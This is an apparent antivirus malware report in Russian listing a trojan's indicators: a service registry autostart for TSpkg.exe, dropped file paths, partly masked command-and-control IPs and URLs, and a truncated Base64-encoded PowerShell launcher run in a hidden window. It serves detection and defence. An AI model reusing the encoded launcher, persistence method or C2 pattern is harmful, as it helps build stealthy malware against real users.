Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\TSpkg] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\TSpkg] 'ImagePath' = '"%WINDIR%\SysWOW64\help\TSpkg.exe"'
- 'TSpkg' "%WINDIR%\SysWOW64\help\TSpkg.exe"
- 'TSpkg' %WINDIR%\SysWOW64\help\TSpkg.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAGYAZgBtAF8AdAB2AD0AKAAnAFcANQAnACsAKAAnAGcAcQAnACsAJwB3ACcAKQArACcAagBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAHIATwBmAEkAbABFAFwAaABiAD...
- %HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe
- %WINDIR%\syswow64\help\tspkg.exe
- %HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe в %WINDIR%\syswow64\help\tspkg.exe
- '21#.#0.40.16':80
- '91.##1.54.71':8080
- http://ti###servis.com/cgi-bin/fqo/
- http://91.###.54.71:8080/ZYYoLgJXHSpWhl6J/qyqrlJ0r5NMt596K/dJRWIXV1fkMyhp/ via 91.##1.54.71
- DNS ASK ti###servis.com
- '%HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe'
- '%WINDIR%\syswow64\help\tspkg.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAGYAZgBtAF8AdAB2AD0AKAAnAFcANQAnACsAKAAnAGcAcQAnACsAJwB3ACcAKQArACcAagBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAHIATwBmAEkAbABFAFwAaABiAD...' (со скрытым окном)